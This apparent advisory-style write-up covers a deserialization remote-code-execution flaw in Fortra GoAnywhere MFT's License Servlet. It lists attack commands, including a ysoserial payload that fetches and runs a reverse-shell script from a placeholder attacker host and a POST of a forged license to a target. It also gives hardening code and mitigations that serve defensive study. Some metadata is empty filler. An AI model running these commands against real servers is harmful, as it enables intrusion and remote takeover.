How the CVE Works
The vulnerability exists within the License Servlet of Fortra’s GoAnywhere MFT application. The servlet improperly handles license-related requests: an attacker can forge a license response that carries a valid cryptographic signature and embeds a maliciously crafted serialized object. When the servlet processes the request, it deserializes the attacker-controlled object without adequate validation, and insecure deserialization allows arbitrary classes to be instantiated and their associated code to run. The signature check offers no protection here, because the signature is valid for the overall structure and says nothing about what the embedded object is. Consequently, an attacker can leverage this to achieve remote code execution (RCE) on the underlying server with the privileges of the GoAnywhere MFT application, leading to a full compromise of the system.
Platform: Fortra GoAnywhere MFT
Version: Affected Versions
Vulnerability: Remote Code Execution
Severity: Critical
Date: 2024-02-05
Prediction: Patch Available
What Undercode Says:
`curl -X POST -H "Content-Type: application/xml" --data-binary @forged_license.xml http://TARGET:8000/goanywhere/licenseservlet`
`java -jar ysoserial.jar CommonsCollections5 "curl http://ATTACKER/revshell.sh | bash" > payload.ser`
`openssl dgst -sha256 -sign private.key -out forged_license.xml.signature forged_license.xml`
How the Exploit Works:
An attacker forges a license response file containing a serialized Java object designed to execute OS commands, often using a gadget chain from a library like Apache Commons Collections. The attacker signs this entire malicious payload with a valid private key to create a correct signature. This signed payload is then sent via an HTTP POST request to the `/goanywhere/licenseservlet` endpoint. Upon receipt, the servlet validates the signature, which passes, and then proceeds to deserialize the embedded object, triggering the command injection and granting the attacker shell access.
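The sequence above is an instance of a general pattern: a signature is verified over a blob and then `readObject()` is called on the same bytes, so the check proves who signed the data but not which classes it will instantiate. The Java example below is added here for illustration and is not Fortra's code; `LicenseResponseParser`, `LicenseResponse`, `verifySignature` and the two parse methods are hypothetical names. It shows the unfiltered pattern beside one that uses a JDK 9+ `ObjectInputFilter` to allow-list the single expected class, so a signed-but-forged stream naming any other class is rejected before it is instantiated.

```java
import java.io.ByteArrayInputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.Serializable;
import java.security.PublicKey;
import java.security.Signature;

// Illustrative only; LicenseResponse, verifySignature and the parse methods are hypothetical.
public class LicenseResponseParser {

    // The one class the servlet should ever expect back (primitive and String fields only).
    public static final class LicenseResponse implements Serializable {
        private static final long serialVersionUID = 1L;
        public String licensee;
        public long expiresEpochSeconds;
    }

    // A signature over the raw bytes proves who produced them, not what they deserialize into.
    static boolean verifySignature(byte[] body, byte[] sig, PublicKey signerKey) throws Exception {
        Signature s = Signature.getInstance("SHA256withRSA");
        s.initVerify(signerKey);
        s.update(body);
        return s.verify(sig);
    }

    // VULNERABLE pattern: signature passes, then readObject() instantiates whatever class
    // descriptors the stream names, so a gadget chain runs before any cast is checked.
    static Object parseUnfiltered(byte[] body, byte[] sig, PublicKey key) throws Exception {
        if (!verifySignature(body, sig, key)) throw new SecurityException("bad signature");
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(body))) {
            return in.readObject();
        }
    }

    // HARDENED pattern: a JDK 9+ deserialization filter allow-lists the expected class,
    // rejects every other class name ("!*") and caps graph depth and reference count.
    static LicenseResponse parseFiltered(byte[] body, byte[] sig, PublicKey key) throws Exception {
        if (!verifySignature(body, sig, key)) throw new SecurityException("bad signature");
        ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(
                LicenseResponse.class.getName() + ";java.lang.String;maxdepth=2;maxrefs=16;!*");
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(body))) {
            in.setObjectInputFilter(filter);   // rejected classes throw InvalidClassException
            Object o = in.readObject();
            if (!(o instanceof LicenseResponse)) throw new InvalidClassException("unexpected type");
            return (LicenseResponse) o;
        }
    }
}
```

The filter is applied before each class in the stream is resolved, which is what makes it effective against a payload whose signature is valid; a cast after `readObject()` is too late, because the gadget chain has already run.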
Protection from this CVE:
Apply vendor patch immediately. Isolate the GoAnywhere MFT instance from the internet. Restrict network access to the administrative ports. Use strict egress filtering to block outbound connections from the server. Monitor for anomalous processes and network connections originating from the application server.
Impact:
Complete system compromise. Unauthenticated remote code execution. Full access to managed files and databases. Potential for lateral movement within the network.
Sources:
Reported By: www.cve.org